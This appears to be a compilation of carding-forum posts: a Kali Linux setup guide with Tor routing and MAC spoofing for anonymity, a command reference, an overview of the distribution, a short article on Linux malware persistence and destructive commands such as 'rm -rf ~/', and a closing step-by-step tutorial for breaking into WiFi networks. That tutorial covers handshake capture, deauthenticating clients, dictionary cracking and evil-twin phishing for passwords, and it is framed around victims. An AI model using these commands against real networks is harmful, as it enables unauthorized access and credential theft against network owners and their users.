Kali Linux for newbies

[Carder]

This article is written for those who are just about to take their first steps.

Let's go!

Start​

The first thing you need to do is purchase an 8 gigabyte flash drive (minimum).

Download the program https://rufus.ie/, you will need it to write the image to a USB flash drive.

Then download the Kali Linux image https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-installer-amd64.iso

Format the USB stick completely before starting the installation.

After you have successfully completed the steps above:​

• Feel free to open Rufus;
• Click to choose an .iso image;
• Choose the previously downloaded Kali image;
• Press "Start";
• After that a window will come out in which you need to click "Yes" and select an entry in the "DD image" mode;
• You wait for the end of the recording and close Rufus.

You have coped with the creation of the installation flash drive. Move on:​

• Reboot your PC;
• Put your USB flash drive like an installation one in BIOS. Or just select it in the Boot Menu, it usually opens via f5 or f8 or by pressing the Delete key;
• Choose INSTALL (don't mix it up with the instal graphics, we don't need this);
• When installing, select disk encryption lvm (you will need to come up with a password for encrypting the hard disk by at least 40-50 characters and keep this password in your head).

You can install the system as the main one or next to another OS.

You installed the system. Congratulations, let's move on:​

After installation, create a root user with full access rights to the system:

• Open the terminal (in the upper left corner there is a black square);

You can also open the terminal by pressing Ctrl + Alt + T (I advise you to open this way).

• Write in it: sudo su
• Further: passwd root
• Come up with a new password and enter it 2 times. (the main thing is not to forget it, otherwise you will have to reinstall the system), the password is written, it just does not appear on the screen;
• Next, restart your computer and log in as root and a new password .

Login as root? Fine!

• Open a terminal and write: apt update
  With this command you will update application packages to the latest versions.
• Then write: apt dist-upgrade
  With this command you will update the system itself.

If there are errors and the system is not updated, then do the following:

Go to /etc/apt/sources.list manually.

The file should contain the following lines:

deb http://http.kali.org/kali kali-rolling main non-free contrib

# deb http://http.kali.org/kali kali-rolling main non-free contrib

If not, then register manually and save.

There should be no problems now.

What is Terminal in Kali Linux​

Many do not understand what a terminal is in Kali Linux and where it came from at all. A long time ago, in the 90s, to configure and administer the system, someone had to go to the terminal, log in and make the necessary changes.

He looked something like this.

Try to imagine: you enter a room in which there is something that looks like a TV screen fixed on a huge computer, this TV screen was called a terminal. Basically, the terminal was a display that would display the actions and the result of any command executed.

The display itself did not understand what you were entering, it did not understand your actions, it was needed only in order to accept commands and show the result. Your actions were understood by the program running in the background. She understood what you were entering, what keys you pressed, processed the information received and produced the result that is displayed in the terminal.

At that time, 2 components were needed: the physical screen itself or the terminal + the program that worked in the background.

On Linux, this program is located in the directory /bin/bash

Let's go and look at this program and find it, this program, it understands what you enter in the terminal.

To see select the file system on the desktop and go further through the directories.

Why am I telling all this? Because in Linux, work happens exclusively with the terminal, you must understand this.

The terminal symbolizes the computer screen from the 90s. If you open a terminal, then this program will already work in it. This is called a shell , and bash is already running in it .

Press ctrl + alt + f1 and you will see a clean linux-system without a graphical interface (it was invented much later), you can work from there, as it was before. To go back press ctrl + alt + f7.

Bash runs in the terminal by default. Otherwise, the terminal would not be able to receive information for input and display the result. This shell processes commands in the background and sends the result back to the terminal for display.

It is much more efficient than the graphical user interface, as opposed to it is always available on servers. When you make hacks, you will often come across servers without a beautiful graphical interface, since it requires a lot of resources, it needs disk space and RAM. Such costs are unaffordable for servers and should not affect performance.

In fact: the terminal is always on the servers, but there is no graphical interface. Therefore, it is very important that you know how to navigate any Linux system using a terminal or shell. As a rule, when you hack something, your goal is to gain access to the shell on a remote machine, on your victim's machine. This is done, for example, by a warrior, botnet, stealer or rootkit.

File system​

Now let's deal with directories or, as they are also called, directories. Open the filesystem on your desktop and find these directories. Now I will explain what is needed and why.

There are no C, D drives, and so on, familiar to Windows users. The Linux file system has a tree structure and is based on the root directory, which is denoted by the " / " symbol, followed by the rest of the directories.

Many people are stopped by the stereotype that Kali Linux is very difficult and you need to be a cool hacker. In fact, this is complete nonsense, there is nothing supernatural in this operating system, and after some time of use, you will feel 10 times more comfortable in it than in Windows.

Now let's run all your traffic through the TOR network​

• Open the terminal and write: apt install tor(install the tor network itself). apt is the application that looks for what you need to install, the install command is to install, tor is the application that you need to install;
• systemctl start tor (we give the services team permission to start traffic through tor);
• git clone https://github.com/ruped24/toriptables2 (install the utility from github);
• cd toriptables2 (go to the folder with our utility);
• Fill in next: mv toriptables2.py /usr/local/bin/

Now you can route all traffic through Tor with the command:

toriptables2.py -l (include);
toriptables2.py -f (turn off).

Now let's make it so that every time the system boots, your mac address changes to a random one​

First you need to download the leafpad text editor:

apt install leafpad

After downloading, prescribe:

leafpad /etc/NetworkManager/NetworkManager.conf

A text document will open for you.

In this text document, you need to specify at the end of the line and save:

[connection]

wifi.cloned-mac-address=random

[connection]

ethernet.cloned-mac-address=random

1 this is for wifi, 2 is for wired connection.

After that, you need to restart Network Manager in the terminal:

service network-manager restart

Now your MAC address will change to a random one after every Kali boot.

Thank you all for your attention!

 

[Carding 4 Carders]

Kali Linux Commands from A to Z​

Kali Linux is a Debian-based Linux distribution designed for digital forensics and penetration testing.
It is supported and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns and Raphael Hertzog are the main developers.
Kali Linux has more than 600 penetration testing programs pre-installed, including nmap (port scanner), Wireshark (packet analyzer), John the Ripper (password cracker) , Aircrack-ng (a Suite of programs for testing wireless local area networks for penetration), Burp Suite, and OWASP ZAP (both web application security scanners).
Kali Linux can run in its original mode if it is installed on the computer's hard disk, it can be downloaded from a live CD or USB storage device, or it can run on a virtual machine.
It supports the Metasploit Framework Metasploit Project, a tool for developing and implementing security exploits.

All Kali Linux commands​

Here below, we list the Kali Linux a-Z commands that will help you simplify your work.

Kali Linux commands	Command functions
apropos	Search for Man pages (man-k)
apt-get	Search and install software packages (Debian)
aptitude	Search and install software packages (Debian)
aspell	Spell check
awk	Find and replace text, sort / check / index the database
basename	Basic Strip directory and file name suffix
bash	GNU Bourne-Again Shell
bc	Calculator
bg	Send to background
break	break out of the loop
builtin	Launching the built-in shell
bzip2	Compress or decompress
cal	Calendar
case	Conditionally execute the command
cat	Output (display) of file contents
cd	Changing the folder
cfdisk	Partition table manipulator for Linux
chgrp	Changing the owner's group
chmod	d Change access rights
chown	Change the file owner and group
chroot	Run the command with a different root directory
chkconfig	Chkconfig system services (runlevel)
cksum	Print the CRC checksum and the number of bytes
clear	Clear the screen
cmp	Compare two files
comm	Comparing two sorted files line by line
command	Run command-ignores shell functions
continue	Resume the next iteration of the loop
cp	Copying it
cron	Daemon for executing scheduled commands
crontab	Schedule the command to run at a later time
csplit	Split the file into context-specific parts
cut	Split the file into several parts
date	Displaying or changing the date and time
dc	Desktop calculator
dd	Convert and copy a file, write disk headers, boot records
ddrescue	ddrescue data recovery tool
declare	Declare variables and assign attributes to them
df	Show free disk space
diff	Show differences between two files
diff3	Show differences between three files
dig	DNS lookup
dir	Briefly list the contents of the catalog
dircolors	Setting the color for " ls”
dirname	Convert full path to just path
dirs	Show list of remembered directories
dmesg	Print kernel and device messages
du	File space usage
echo	Show message on screen
egrep	Find files for strings that match an extended expression
eject	Remove removable media
enable	Enable and disable shell built-in commands
env	environment variables
ethtool	Ethtool Ethernet card settings
eval	Evaluate multiple commands / arguments
exec	Run the command
exit	Exiting the shell
expect	Automate custom applications available through the terminal
expand	Convert tabs to spaces
export	Set the environment variable
expr	Evaluate expressions
false	Do nothing, without success
fdformat	Low-level floppy disk formatting
fdisk	Partition table manipulator for Linux
fg	Send your work to the foreground
fgrep	Search files for strings that match a fixed string
file	Determine the file type
find	Search for files that match the specified criteria
fmt	Reformat the paragraph text
fold	Wrap the text to fit the specified width
for	Cyclic expression
format	Format of disks or records
free	Memory usage
fsck	Checking and correcting file system integrity
ftp	ftp file transfer Protocol
function	Define function macros
fuser	Identify / kill the process that accesses the file
gawk	Find and replace text in files
getopts	Parsing positional parameters
grep	Search for files on strings that match a given pattern
groupadd	Add to group and user
groupdel	Delete a group
groupmod	Change a group
groups	Output of group names
gzip	Compress or decompress files
hash	Запомнить полный путь к имени аргумента
head	Вывод первой части файлов
help	Show help for the built-in command
history	Team history
hostname	Output or set the system name
iconv	Converting a file's character set
id	Displaying user and group IDs
if	Part of the cycle
ifconfig	Configure the network interface
ifdown	Stop the network interface
ifup	Launch the network interface
import	Capture the X server screen and save the image to a file
install	Copy files and set attributes
jobs	List of tasks
join	Connect lines on a common field
kill	Stop the process
killall	Kill processes by name
less	Displays one screen at a time for scrolling
let	perform arithmetic on shell variables
ln	Create a symbolic link to the file
local	Create variables
locate	Find files
logname	Display the current username
logout	Exiting the login shell
look	Show lines starting with this line
lpc	managing the printer
lpr	Offline printing
lprint	Print the file
lprintd	Abort a print job
lprintq	Print queue list
lprm	Remove jobs from the print queue
ls	Show information about files
lsof	list of open files
make	Recompile a group of programs
man	Reference guide
mkdir	Create new folders
mkfifo	Create FIFOs (named channels)
mkisofs	Create an ISO9660 / JOLIET / HFS hybrid file system
mknod	Create a block or special character files
more	Displays one screen at a time for scrolling
mount	Mount the file system
mtools	Manipulates MS-DOS files
mtr	MTR network diagnostics (traceroute / ping)
mv	Move or rename files or directories
mmv	Move or rename files EN masse
netstat	Network information
nice	Set the priority of a command or task
nl	Number of lines and file entries
nohup	Run a command that is immune to freezes
notify-send	Send notifications to your desktop
nslookup	Request DNS server names interactively
open	Open a file in the default app
op	Access operator
passwd	Change the user's password
paste	Merge file lines
pathchk	Check file name portability
ping	Checking network connectivity
pkill	Stop processes
popd	Restore the previous value of the current folder
pr	prepare files for printing
printcap	Printer capabilities database
printenv	Output of environment variables
printf	Data format
ps	Process status
pushd	Save and then change the current folder
pwd	Display the current folder
quota	Show disk usage and restrictions
quotacheck	Checking the file system for disk usage
quotactl	Set disk quotas
ram	RAM disk
rcp	copy files between two machines
read	Read a string from standard input
readarray	Reading from standard input to an array variable
readonly	Mark variables / functions as " read-only”
reboot	System restart
rename	Rename files
renice	Priority of running processes
remsync	syncs deleted files via email
return	Exiting a shell function
rev	Reverse file lines
rm	Delete files
rmdir	Delete folders
rsync	Remote file copying (Synchronization of file trees)
screen	Multiplex terminal screen, launching remote shells via ssh
scp	Secure copy (remote file copying)
sdiff	merge two files interactively
sed	Stream Editor
select	Accept keyboard input
seq	Output of numeric sequences
set	Manipulating shell variables and functions
sftp	Secure file transfer program sftp
shift	Shift of positional parameters
shopt	Shell options
shutdown	Shutting down or restarting Linux
sleep	Delay for the specified time
slocate	find files
sort	sort text files
source	Running a command from a file
split	Split the file into fixed-size parts
ssh	SSH Secure Shell client (remote login program)
strace	Trace system calls and signals
su	Replace user identity
sudo	Run command as another user
sum	Print the checksum of a file
suspend	Suspend execution of this shell
symlink	Create a new name for the file
sync	Sync data on disk
tail	Output the last part of the file
tar	Tar Archiver
tee	Redirect output to multiple files
test	Evaluate a conditional expression
time	Time measurement program
times	User and system time
touch	Change file timestamps
top	list of processes running on the system
traceroute	tracing the route to the host
trap	Run the command when the signal is set (born)
tr	Translate, compress, and / or delete characters
true	Do nothing, successful execution, part of the loop
tsort	Topological sorting
tty	y Print the terminal file name to standard input
type	Describe the team
ulimit	Restrict user resources
umask	Mask for creating a file by the user
umount	Unmount the device
unalias	Delete an alias
uname	Display system information
unexpand	Converting spaces to tables
uniq	Unify files
units	Converting units from one scale to another
unset	Delete variable or function names
unshar	Unpack shell script archives
until	Execute commands (before error) part of the loop
uptime	Show opening hours
useradd	Create a new user account
usermod	Change the user account
users	List of users who are currently logged in
uuencode	Encode a binary file
uudecode	Decrypt the file created by uuencode
v	Detailed list of folder contents ('ls-l-b’)
vdir	Detailed list of folder contents ('ls-l-b’)
vi	Vi text editor
vmstat	Report virtual memory statistics
wait	Wait for the process to complete part of the loop
watch	Periodically execute / display the program
wc	Output bytes, words, and the number of lines
whereis	Search for the program path, man pages, and source files for the user.
which	Search for the program binary
while	Command execution part of the loop
who	Displays all the names of logged-in users
whoami	Displays the current user ID and name (id-un ’)
wget	Download web pages or files via HTTP, HTTPS, or FTP
write	Send a message to another user
xargs	The xargs Execute utility that passes constructed argument lists
xdg-open	xdg-open Open a file or URL in the application selected by the user.
yes	Print a string until the command is interrupted

 

[Carding]

Kali Linux​

Kali Linux is one of the Linux distributions designed for hackers and information security professionals. Therefore, it is not surprising that this raises its popularity and many newbies and people who do not have any knowledge of information security are trying to use this distribution as the main system. But Kali Linux is not designed for this at all. In today's article, we will look at what Kali Linux is, why you need it, and give an overview of Kali Linux.

1. Development history
Kali Linux was developed by the security firm Offensive Security. It was created on the basis of Debian and contains the developments of the distribution kit for digital forensics and security testing BackTrack.
The first version of BackTrack was released in 2006, it combined several projects, the main purpose of which was penetration testing. The distribution was intended to be used as a LiveCD.
In 2012, a distribution such as BackTrack ceased to exist, and instead of it Kali Linux appeared, which took over all the advantages of the previous version and all the software. It was the result of the merger of two projects: WHAX and the Auditor Security Collection. Now the distribution kit is steadily developing and the efforts of the developers are aimed at fixing errors and expanding the set of tools.

2. Purpose
The official website has the following description of the distribution: "Penetration Testing and Ethical Hacking Linux Distribution" or, in our opinion, a distribution for penetration testing and ethical hacking. Simply put, this distribution contains many security and networking tools that are geared towards computer security experts.
A Linux distribution is nothing more than a kernel and a set of basic utilities, applications, and defaults. Kali Linux does not provide anything unique in this regard. Most programs can be easily installed on any other distribution, or even on Windows.
The difference with Kali Linux is that it is filled with tools and settings that are needed for security testing, and not to ensure the normal operation of the average user. If you want to use Kali instead of the main distribution, you are making a mistake. This is a specialized distribution kit for solving a certain range of tasks, which means that solving tasks for which it was not intended will be more difficult, for example, the same search for programs. Kali Linux's capabilities are focused on security testing.

3. Installation
You can download the installation image on the official website, you just need to choose the architecture. After booting, be sure to check the disk for damage by comparing the SHA256 checksum. Since this distribution is intended for security testing, I really don't want it to be broken in any way.

4. Features
Many will be surprised, but the default user in Kali Linux is root. This is necessary because many programs need superuser rights to run. This is one of the reasons why you shouldn't use Kali for everyday tasks like surfing the Internet or using office applications.
If we talk about software, then all the supplied programs are focused on security. There are graphical programs, and there are terminal commands, and several basic utilities are included in the system, such as an image viewer, a calculator, and a text editor. But here you will not find office programs, e-readers, email programs and organizers.

Kali Linux is based on Debian, and nothing prevents you from installing a program from the repositories, for example, thunderbird for collecting mail. But viewing mail as the superuser is not a good idea. Of course, no one bothers you to create an unprivileged user, but this is extra work.
On the Kali Linux login screen, you can see the motto "The quieter you become, the more you are able to hear" or "The quieter you are, the more you can hear." If you watch the packages sent to the network by the Debian system, you will notice that some packages are regularly posted to the network. Some of them are sent by user applications, others by background services.
For example, if you scan your Linux machine with Nmap, you might see several open ports. For example, it can be a never used VNC port and an HTTP server. Some of these programs come by default, some you installed and forgot.
Kali Linux strives to be as quiet as possible. This is necessary to hide your presence in the attacked network and to protect yourself from potential attacks. To accomplish this, many services are disabled in Kali that are enabled by default in Debian. Of course, you can install the service you want from the Debian repositories.

For example apache2:

However, after that, the utility will not start automatically and will not be added to startup. If you need it, you will have to start it manually. On each reboot, all unnecessary services are disabled. It is possible to go around and add the service to the /usr/sbin/update-rc.d whitelist, but this is not entirely secure since you are opening the system path. Nobody knows if there are any vulnerabilities.
Kali Linux is a specialized distribution, if only because it is designed to work in an aggressive environment. And if you installed a web server and a few other programs, added them to startup, you may have already broken Kali and reduced its security.

5. Programs
As stated above, the Kali Linux distribution contains only specific security testing software. But many of the programs needed for normal operation are not available. And there is no guarantee that you will find them in the repositories, even if they are available in Debian.
You may want to add third-party repositories and application sources to install what you need, or add a repository that contains the most recent version of the program. You can, but you shouldn't. Even for Debian it is not recommended to do this, the developers call this phenomenon FrankenDebian and say that it can break the stability of the system.
Kali Linux is even more complicated. You risk not only damaging the system, but also making it unsafe. Packages from the repositories have been checked and contain additional changes, for example, the same Apache is not added to startup. Third party packages will not have such precautions.
We will talk about the software part in a separate article, because it is impossible to describe hundreds of unique tools in one article and not get confused.

Findings
Our review of Kali Linux features is coming to an end. Whether you should choose this distribution kit or not depends on you and the tasks that you are trying to solve with the help of the system. If you only need a few tools, then it is better to choose some simpler distribution, for example, Ubuntu or Debian. You will be able to install all the necessary tools in it. The same option is better for new users.
But if you are already well versed in Linux and are ready to spend a lot of time to understand information security, this system may be for you. But do not rush to install it on your computer. Use a virtual machine, then install it as a secondary, second system.

 

[Hacker]

Linux security

Configuring Linux.
You can often find the opinion that Linux is safe. So far, this is really true, no one has made a particularly thorough effort to create attacking programs, which is why the illusion of security is created. However, let's try to pay attention in advance to those things in the Linux system that may be of interest to intruders in the future.
This article does not pretend to be a complete overview of the problems, I just want to outline the contours of a problem that already exists, but is not yet particularly solved. Some of the described security methods can be made to work right now, and some should be made to implement the authors of the system software.
Update For some reason, for some readers, the general idea of the article turned out to be incomprehensible, so I will write it explicitly: the idea is to show some specific examples of the use of known attacks (if you can call it an "attack", of course)in a Linux environment.
It makes no sense to talk about the methods of penetration, harmful software will still leak to any system.

Autoplay
So, a virus in the system, for example, through a hole in libflash launched the downloaded binary; to survive, it needs to register itself in autoload.
We don't even talk about such a small thing as masking the virus name in the process list. The virus can easily impersonate anything.
In addition to the DE tools, there are various startup scripts of the ~/type.xsession or ~/. profile, or.zshrc. If you really want to, you can probably even put some destructive stuff in ~/.fonts.conf.
How to fight? No way. While there are no reliable control tools, no one (from the software authors) really bothers with the mess in the scripts. A paranoid solution is to read hash sums from critical user config files and store them in a place inaccessible to user changes. Then, at startup, check all hash sums.

Disguise
In addition to registering itself in the autorun file, the virus can add a bunch of useful information to its configuration files. One of the most attractive targets can be the PATH environment variable. Let me remind you that this variable stores a list of paths that will be used to search for an executable program. Usually, the PATH variable looks something like this:/usr/bin:/bin, and the virus can modify it as ~/bin:/usr/bin:/bin. This is fraught with the fact that now a program typed without specifying the full path will first be searched in the user directory, and only then in the system ones.
The solution? Use only full paths when running programs. However, this is not guaranteed protection. A more reliable solution would be to restrict access to modification of critical environment variables.

Wrecking activity
Everything here is quite sad. As a rule, one command —rm-rf ~/ - is enough to cause maximum damage. After that, you can say goodbye to all the data.
Also, nothing prevents you from encrypting all data in the home directory, as some Windows viruses do.
It is also possible and more minor sabotage, for example, prescribing in the browser configs of all sorts of rubbish (spoofing the home page, for example). It is impossible to deal with this issue centrally, and app authors should understand it.
Undoubtedly, the standard location of app profiles will make life much easier for attackers. For example, the Opera profile will almost always be located in the ~/.opera directory. So you can partially save yourself by changing the standard profile paths.Many applications allow you to do this.

Conclusions
Decent security requires a fair amount of paranoia. A system for monitoring running applications (comparing the hash sums of executable files and scripts) can significantly complicate the virus's life. You can prevent "getting caught" on a disk by prohibiting writing to this very disk. At the same time, you still need to provide some way to modify the configuration files.
The described methods and options are just what comes to mind when you try to think about the problem. For sure, there will be some other particularly refined methods (such as using~/.fonts. conf), but that's enough to start with. But software manufacturers, including system ones, do not think much about such primitive household safety issues. I should have.

 

[Mutt]

Kali Linux is not Linux for beginners, but a powerful weapon of a hacker, or one who fights against these hackers. Kali Linux is a super penetration testing and security auditing distribution.

Kali Linux is a descendant of the famous BackTrack Linux, but it is already based on Debian and accordingly supports its packages in general and applications in particular.

What is Kali Linux?
Kali Linux, of course, has its own official website, and the best part is that there is documentation too, so you don't need to know English to understand all the intricacies of this OS. And since the functionality of Kali Linux is huge, you just have to read the manuals.

What does Kali Linux look like in general? Probably this is the first thing that every person pays attention to, because they are greeted by clothes, as they say ...

What is also very interesting and important is the fact that Kali Linux was ported to the ARM architecture, which means that it can be safely installed on a tablet. The site has detailed instructions on how to build your image for ARM. I have noticed for a long time that more and more Linuxes are porting their assemblies to ARM, since all mobile devices today use this particular architecture.

Here is such a Linux Kali, great and terrible, a favorite of hackers and system administrators!

How to hack WiFi using Kali Linux?
First, we'll check the available network interfaces. This can be done with the command:

iwconfig

In this case, you will see a similar picture:

In this case, there are 2 available network interfaces, wlan0mon (about the monitoring mode a little later) and wlan1 (wlan0).

After this step, there are several possible paths:

• The way is simpler and for the lazy: use the wifite utility
• Do everything with pens and yourself

In the first case, you only need:
- select the device from which to carry out the attack (network interface)
- select the attacked network
- then the utility will do everything by itself: it will either capture a handshake if you attack a WPA network without WPS, or it will attack using Pixie if WPS is enabled.
- in the case of WPA, Wifite can be launched by specifying the dictionary that it will use to crack the handshake (wifite –dict wordlist.txt).

When we made sure that the Wi-Fi adapter is connected and working, we need to find out the signal of which networks it catches, one of the options, turn on the wireless interface and scan.

To do this, we will use the following commands:
ifconfig wlan1 up - in this case wlan1 is the name of the network interface
iwlist wlan1 scanning - scanning using the wlan1 interface
and we get something like this:

We are interested in several parameters at once:
Network name, MAC address, channel.

Now let's try to capture a handshake, for this we need to put the network interface into monitoring mode and capture a handshake.

To switch to monitoring mode, use the command:
airmon-ng start wlan1 - in this case, the interface will change the name to wlan1mon and go into monitoring mode (you can check this using iwconfig), while you may be warned that some processes can interfere with this, do not pay attention, this is normal ...

For a more accurate capture of the handshake, we will use the information we received from the scan:

Airodump-ng wlan0mon –-bssid FC: 8B: 97: 57: 97: A9 –-channel 2 -–write handshake –-wps

wlan0mon - interface name
bssid FC: 8B: 97: 57: 97: A9 - MAC address of the router we are hacking
channel 2 - restriction on the channel for the router we hack
write handshake - this command allows us to write the captured information to files called handshake
wps - will display the availability of WPS at the point in case you missed it.

This is how the process of capturing a handshake looks like.
Considering that a handshake occurs when a client connects to an access point, then we need to either wait for the client to connect to the access point (for example, by coming home, to the office, or turning on a laptop / wifi) or help the client to reconnect to the access point using deauthentication and capture of the handshake on subsequent connection. An example of deauthentication.

aireplay-ng -0 10 –a FC: 8B: 97: 57: 97: A9 –c 68: 3E: 34: 15: 39: 9E wlan0mon

-0 - means deauthentication
10 - the number of deauthentication
-a FC: 8B: 97: 57: 97: A9 - MAC address of the access point
–C 68: 3E: 34: 15: 39: 9E - Client MAC address
wlan0mon - used interface

When you catch a handshake it will be displayed in the upper right corner.

Now that we have caught a handshake, it is advisable to check it, clean it up, remove all unnecessary and guess the password.

You can check in several ways:

1) using the cowpatty utility

cowpatty -r handshake-01.cap -c

-r specifies the file to check
-с indicates that we need to check the handshake and not hack it

As we can see in the screenshot, in the first file we did not have the correct handshake, but in the second we did.

2) Using Wireshark
To do this, you need to open the wireshark'om file, this can be done both from the terminal (wireshark handshake-01.cap) or manually. With this, you will see a large number of packages. Let's filter out the handshake packets using a filter:

eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08

and click apply

Now we need to leave the broadcast of the access point, and the first 2 handshake packets, removing everything else. At the same time, it is necessary to ensure that the number of the first 2 packages does not differ too much, so that they are from the same handshake.

In this case, you can select the Broadcast and the first 2 packets and save them separately.

3) the easiest way is the WPAclean utility.

wpaclean handshake-01.cap wpacleaned.cap

handshake-01.cap - this is the source file from which the handshake will be taken
wpacleaned.cap is the file where the cleaned handshake will be written.

As we can see, the output of the program is somewhat different, this is due to the fact that the first file did not contain all the necessary information.

Now that we have the correct cleaned handshake, it remains for us to decipher it.

To get a password from Wi-Fi, we need to find a password, when using which hashes for 2 of our handshakes will match. To do this, you can use a dictionary or select by symbols. If you do not have a supercomputer, then this option is unlikely to suit you, since the number of options is the number of allowed characters to the power of the number of password characters (~ 130 ^ 8 for an 8-digit password). It makes sense to use character matching if you know a piece of the password that will reduce the number of options, or if the password is limited (for example, there are only numbers, or it matches a mobile phone in your area). Now we will brute-force a password using a dictionary.

We can decrypt the handshake using a CPU or GPU. Usually, if you have a powerful video card, then using the GPU is faster.

We'll use aircrack to decrypt with the CPU.

aircrack-ng wpacleaned.cap –w wordlist.txt

wpacleaned is our cleaned and tested handshake
-w wordlist.txt is our dictionary, by which we will guess the password

If the password is in the dictionary, then after a while you will see the corresponding message:

This will contain your password. Or a message that the dictionary has ended, but the password has not been found.

A utility for hacking through the GPU called pyrit has much more capabilities and fine-tuning, but sometime about them next time, now we will just try to guess the password for the handshake with our specific dictionary.

pyrit –r wpacleaned.cap –i wordlist.txt attack_passthrough

-r wpaclean.cap - handshake file
-I wordlist.txt - dictionary file

If that doesn't work:

You can try to apply a mixture of social engineering and attack on Wi-Fi, for this there are 2 utilities:
A) Linset
B) Wifiphisher

For wifiphisher we need 2 Wi-Fi adapters. In short, it happens like this:

• With the help of 1 adapter, we jam target points
• On the second adapter, we raise an open point with the same name
• When the target cannot connect and use its point, it may connect to our
• The target will have a "similar" to a truthful window where they will be asked to enter the password from the WiFi in order for the router to complete the update.

In this case, the correctness of the entered password for the update is not checked.
Linset works in a similar way. But the key feature of this utility is that it is in Spanish,
There is no English and even more so the Russian version, unfortunately it did not start for me.

Thanks for attention!